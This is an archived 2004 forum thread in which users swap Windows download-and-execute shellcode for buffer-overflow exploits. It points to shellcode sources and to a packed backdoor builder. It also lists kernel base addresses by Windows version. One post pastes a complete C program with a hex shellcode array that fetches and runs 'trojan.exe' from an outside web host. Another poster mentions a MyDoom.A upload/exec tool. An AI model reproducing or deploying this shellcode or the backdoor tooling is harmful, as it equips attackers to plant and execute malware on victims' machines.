Full Version: Specific Shellcode
I'm looking for a specific shellcode that will download a file from an ftp or http server (don't remember) onto a system and execute it. I remeber seeing that shellcode in a previous exploit thats why I know that it exists..just don't remember which one. If anybody knows which one I'm talking about lemme know...also if possible documentation for that specific shellcode.
see http://www.metasploit.com i think it has something like this ..
| QUOTE (boshcash @ Feb 10 2004, 04:57 PM) |
| see http://www.metasploit.com i think it has something like this .. |
Yeh I already checked that site..the first one seemed like what I wanted at first but the shellcode isn't designed for ftp since it doesn't have anything built in to handle the ftp protocol..no user/pass support, etc. Nor does it look like it downloads from http servers either...
Perhaps I'm wrong on this one, here is the asm script to the one that is supposed to download a payload:
http://metasploit.com/sc/win2000_vampiric_connector.asm
If im not rite you can go and visit http://www.elitehaven.net, a cool guy.. He uses HTTP, to download ncat.exe and execute it with some parameters 
| QUOTE (sPiKie @ Feb 10 2004, 05:13 PM) |
| If im not rite you can go and visit http://www.elitehaven.net, a cool guy.. He uses HTTP, to download ncat.exe and execute it with some parameters |
Thanks..the guy has some cool shellcodes. The My Generic URL Download + Exec. ShellCode For WinXP seems to be what I'm looking for, gonna try it out.
Peter Winter Smith, he is a respected man.. I have sent/recieved alot of mails from him
He is a sort of friend
Btw, my MyDoom.A Upload/Exec tool thread got a kinda "overflow"
He is a sort of friend
Btw, my MyDoom.A Upload/Exec tool thread got a kinda "overflow"
| QUOTE (vnet576 @ Feb 10 2004, 10:19 PM) | ||
Thanks..the guy has some cool shellcodes. The My Generic URL Download + Exec. ShellCode For WinXP seems to be what I'm looking for, gonna try it out. |
does this works finally ?
hi,
If I geting this right, have you ever tried winshell ?
it's an old one but it's one my favorites.
i use it since a year and I like it cos its's pretty stable.
The main program producing an exe file (server) with your prefered settings built in (password, port, service name, reg key name, file to download and execute from a web server while start, etc).
The server file is around 13300 bytes big, upxed and morphined.
Maybe you want to take a look at it.
http://www.janker.org/zuopin/winshell.zip
If I geting this right, have you ever tried winshell ?
it's an old one but it's one my favorites.
i use it since a year and I like it cos its's pretty stable.
The main program producing an exe file (server) with your prefered settings built in (password, port, service name, reg key name, file to download and execute from a web server while start, etc).
The server file is around 13300 bytes big, upxed and morphined.
Maybe you want to take a look at it.
http://www.janker.org/zuopin/winshell.zip
Yeah.. I'll take a look at it... Wanna see if I can make it work 
he is not requesting a backdoor like winshell, but a shellcode.. 
dunnno if it works, but i have that is my saves:
dunnno if it works, but i have that is my saves:
| QUOTE |
| int main () { // Generated by Hex Workshop // essai5.exe - Starting Offset: 4102 (0x00001006) Length: 247 (0x000000F7) unsigned char rawData[] = { "\xEB\x72\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1" "\x8B\x5C\x24\x08\x8B\x70\x30\x03\x74\x24\x04\x38\x1E\x75\x4C\x8B" "\x40\x18\x8B\x58\x3C\x03\xD8\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03" "\xF0\x56\x8B\x73\x24\x03\xF0\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18" "\x4B\x8B\x34\x9A\x03\xF0\x03\x74\x24\x14\x8B\x36\x3B\x74\x24\x18" "\x74\x0A\x4B\x23\xDB\x75\xEA\x58\x58\x33\xC0\xC3\x5F\x33\xC9\x66" "\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04\x07\xC3\x8B\x18\x8B\xC3\x3B" "\xC1\x75\x9D\xC3\xEB\x7C\x33\xDB\x68\x79\x45\x78\x41\x6A\x0A\x6A" "\x4B\x53\xE8\x7B\xFF\xFF\xFF\x33\xC9\x51\x68\x75\x72\x6C\x6D\x66" "\xC7\x44\x24\x04\x6F\x6E\x8B\xEC\x51\x51\x55\xFF\xD0\x68\x69\x6C" "\x65\x41\x6A\x0E\x6A\x72\x6A\x02\xE8\x55\xFF\xFF\xFF\x33\xDB\x53" "\x68\x61\x2E\x65\x78\xC6\x44\x24\x04\x65\x8B\xCC\x53\x53\x51\xFF" "\x75\x18\x53\xFF\xD0\x33\xDB\x68\x69\x6E\x45\x78\x6A\x01\x6A\x4B" "\x53\xE8\x2C\xFF\xFF\xFF\x8D\x4C\x24\x10\x6A\x01\x51\xFF\xD0\x33" "\xDB\x68\x78\x69\x74\x50\x6A\x01\x6A\x4B\x53\xE8\x12\xFF\xFF\xFF" "\xFF\xD0\xE8\x7F\xFF\xFF\xFF" "http://www.chez.com/mvm/trojan.exe" } ; void (*shellcode) () = ( void * ) rawData; shellcode (); return 0; } |
please report your test, and post the shellcode you like if you test and found it!
The shellcode from elite haven works well. It says that its for windows xp only, but I don't have win2k or 2k3 to see if it'll work on those as well. I also found another program that automates the process. The advantage of this is that it automatically compiles and converts the shellcode to hexadecimal format. Other than that they both work well.
http://www.delikon.de/zips/shellcode-v2.0.zip
Basepart, thanks but that program is not a shellcode. Its still a good prog though.
I'll test u're shellcode out karate and I'll reply if it works.
http://www.delikon.de/zips/shellcode-v2.0.zip
Basepart, thanks but that program is not a shellcode. Its still a good prog though.
I'll test u're shellcode out karate and I'll reply if it works.
Thx vnet576, interesting infos
what for a shell are you coding for??
| QUOTE (zero-maitimax @ Feb 16 2004, 06:19 AM) |
| what for a shell are you coding for?? |
Just getting the basics of incorporating differnt types of shellcodes into different exploits. No nothing as complicated as ASN, just very basic overflow exploits with different shellcodes.
http://www.harmonysecurity.com/kungfoo.html
explioan tha pincipe of a total compatible shelcode, but the project is still on devlopement
looks like shellcode have to be specific to OS version!
Windows Version
Kernels Base Address
Win95
0xBFF70000
Win98 (1st and 2nd editions)
0xBFF70000
WinME
0xBFF60000
WinNT (service pack 4 and 5)
0x77F00000
WinXP
0x77E60000
Win2K (service pack 1,2 and 3)
0x77E80000
Win2003 Web Edition
0x77E40000
isn't there somwhere a universal shellcode for all windows versions (that download and execute...)
explioan tha pincipe of a total compatible shelcode, but the project is still on devlopement
looks like shellcode have to be specific to OS version!
Windows Version
Kernels Base Address
Win95
0xBFF70000
Win98 (1st and 2nd editions)
0xBFF70000
WinME
0xBFF60000
WinNT (service pack 4 and 5)
0x77F00000
WinXP
0x77E60000
Win2K (service pack 1,2 and 3)
0x77E80000
Win2003 Web Edition
0x77E40000
isn't there somwhere a universal shellcode for all windows versions (that download and execute...)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
